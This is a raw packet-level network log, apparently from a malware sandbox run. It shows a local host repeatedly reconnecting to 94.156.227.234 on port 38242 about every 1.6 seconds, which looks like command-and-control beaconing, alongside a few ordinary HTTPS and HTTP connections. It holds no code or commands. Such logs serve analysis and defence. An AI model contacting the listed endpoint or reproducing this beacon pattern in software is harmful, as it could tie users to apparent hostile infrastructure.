Dec 24, 2024 11:38:00.888500929 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:01.008038044 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:01.008105040 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:01.008147001 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:01.127764940 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:01.419852972 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 11:38:01.512651920 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:01.679130077 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:02.135406017 CET	38242	60014	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:02.135467052 CET	60014	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:02.514086008 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:02.633791924 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:02.633869886 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:02.633898020 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:02.753550053 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:03.140122890 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:03.211622000 CET	42516	80	192.168.2.23	109.202.202.202
Dec 24, 2024 11:38:03.303211927 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:03.779755116 CET	38242	60016	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:03.779830933 CET	60016	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:04.141582012 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:04.261106968 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:04.261195898 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:04.261235952 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:04.380800009 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:04.766742945 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:04.927160025 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:05.381527901 CET	38242	60018	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:05.381614923 CET	60018	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:05.768095016 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:05.887619972 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:05.887818098 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:05.887818098 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:06.007373095 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:06.392385960 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:06.555149078 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:07.005398989 CET	38242	60020	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:07.005494118 CET	60020	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:07.393711090 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:07.513345003 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:07.513438940 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:07.513478994 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:07.632966042 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:08.018666983 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:08.183160067 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:08.636826038 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:08.636919022 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:09.019917011 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:09.140433073 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:09.140522003 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:09.140564919 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:09.260062933 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:09.644737959 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:09.807172060 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:10.258827925 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:10.258924007 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:10.645719051 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:10.765388966 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:10.765466928 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:10.765510082 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:10.885123014 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:11.269891977 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:11.435285091 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:11.890024900 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:11.890111923 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:12.270992994 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:12.390630960 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:12.390727043 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:12.390754938 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:12.510477066 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:12.895339966 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:13.055418968 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:13.520988941 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:13.521100998 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:13.896420956 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:14.016103983 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:14.016180038 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:14.016205072 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:14.136060953 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:14.520709038 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:14.683374882 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:15.139138937 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:15.139220953 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:15.521950960 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:15.641577959 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:15.641659975 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:15.641701937 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:15.762633085 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:16.147205114 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:16.307415962 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:16.521859884 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 11:38:16.761029959 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:16.761125088 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:17.148329973 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:17.268091917 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:17.268184900 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:17.268213034 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:17.387850046 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:17.772620916 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:17.935425043 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:18.407579899 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:18.407687902 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:18.773736954 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:18.893451929 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:18.893631935 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:18.893716097 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:19.013384104 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:19.398061037 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:19.559406042 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:20.012430906 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:20.012526035 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:20.399085999 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:20.518788099 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:20.518883944 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:20.518922091 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:20.638667107 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:21.023303032 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:21.187582970 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:21.643594980 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:21.643701077 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:22.024382114 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:22.144993067 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:22.145109892 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:22.145149946 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:22.265007973 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:22.649235964 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:22.811592102 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:23.282140970 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:23.282222986 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:23.650412083 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:23.770212889 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:23.770296097 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:23.770329952 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:23.889919043 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:24.274018049 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:24.435434103 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:24.893217087 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:24.893450975 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:25.275134087 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:25.394867897 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:25.395020962 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:25.395020962 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:25.514749050 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:25.898745060 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:26.063586950 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:26.518397093 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:26.518474102 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:26.899775028 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:27.019413948 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:27.019486904 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:27.019514084 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:27.139630079 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:27.522696972 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:27.687589884 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:28.159794092 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:28.159878969 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:28.523509026 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:28.643234968 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:28.643331051 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:28.643331051 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:28.763133049 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:28.808222055 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 11:38:29.146440029 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:29.311779976 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:29.766511917 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:29.766680956 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:30.147093058 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:30.266995907 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:30.267064095 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:30.267096043 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:30.386735916 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:30.775114059 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:30.939704895 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:31.393595934 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:31.393687010 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:31.775949001 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:31.895575047 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:31.895793915 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:31.895793915 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:32.015517950 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:32.399213076 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:32.559762955 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:32.903724909 CET	42516	80	192.168.2.23	109.202.202.202
Dec 24, 2024 11:38:33.016257048 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:33.016335011 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:33.400090933 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:33.520143986 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:33.520260096 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:33.520312071 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:33.639940977 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:34.023133039 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:34.183806896 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:34.634407997 CET	38242	60054	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:34.634520054 CET	60054	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:35.024079084 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:35.143752098 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:35.143843889 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:35.143870115 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:35.263554096 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:35.646874905 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:35.813591957 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:36.273765087 CET	38242	60056	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:36.273833036 CET	60056	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:36.647829056 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:36.767566919 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:36.767785072 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:36.767785072 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:36.887489080 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:37.271303892 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:37.435941935 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:37.900460958 CET	38242	60058	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:37.900571108 CET	60058	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:38.272147894 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:38.391715050 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:38.391830921 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:38.392138004 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:38.511770010 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:38.897439957 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:39.059853077 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:39.533210039 CET	38242	60060	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:39.533297062 CET	60060	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:39.898591042 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:40.019248962 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:40.019424915 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:40.019467115 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:40.139414072 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:40.524338007 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:40.691888094 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:41.143441916 CET	38242	60062	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:41.143528938 CET	60062	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:41.525485992 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:41.645365953 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:41.645462036 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:41.645564079 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:41.765033960 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:42.150538921 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:42.311973095 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:42.777098894 CET	38242	60064	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:42.777367115 CET	60064	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:43.151997089 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:43.271677017 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:43.271805048 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:43.271805048 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:43.392271996 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:43.778810024 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:43.939816952 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:44.780064106 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:44.835128069 CET	38242	60066	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:44.835227013 CET	60066	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:44.899722099 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:44.899985075 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:44.899985075 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:45.019701958 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:45.405723095 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:45.567987919 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:46.027724028 CET	38242	60068	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:46.027841091 CET	60068	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:46.406955004 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:46.526662111 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:46.526844978 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:46.526897907 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:46.646532059 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:47.033602953 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:47.224122047 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:47.649796009 CET	38242	60070	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:47.650048971 CET	60070	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:48.036036968 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:48.155745983 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:48.156002998 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:48.156135082 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:48.275646925 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:48.663659096 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:48.824222088 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:49.285629034 CET	38242	60072	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:49.285943985 CET	60072	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:49.665249109 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:49.784857988 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:49.785147905 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:49.785147905 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:49.904776096 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:50.291889906 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:50.455945015 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:50.919579983 CET	38242	60074	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:50.919787884 CET	60074	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:51.293766022 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:51.413356066 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:51.413449049 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:51.413497925 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:51.533979893 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:51.922184944 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:52.084116936 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:52.537978888 CET	38242	60076	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:52.538278103 CET	60076	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:52.924232960 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:53.044507027 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:53.044696093 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:53.044883966 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:53.164633036 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:53.554408073 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:53.716046095 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:54.182347059 CET	38242	60078	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:54.182571888 CET	60078	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:54.557086945 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:54.676564932 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:54.676914930 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:54.677141905 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:54.796691895 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:55.186336040 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:55.348213911 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:55.801898003 CET	38242	60080	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:55.802229881 CET	60080	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:56.189398050 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:56.308945894 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:56.309336901 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:56.309336901 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:56.428970098 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:56.817513943 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:56.980210066 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:57.441395044 CET	38242	60082	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:57.441601038 CET	60082	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:57.480427027 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 11:38:57.819849014 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:57.939423084 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:57.939683914 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:57.939683914 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:58.059252024 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:58.447065115 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:58.608026028 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:59.066560984 CET	38242	60084	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:59.066756010 CET	60084	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:59.449084044 CET	60086	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:59.568706036 CET	38242	60086	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:59.568958998 CET	60086	38242	192.168.2.23	94.156.227.234
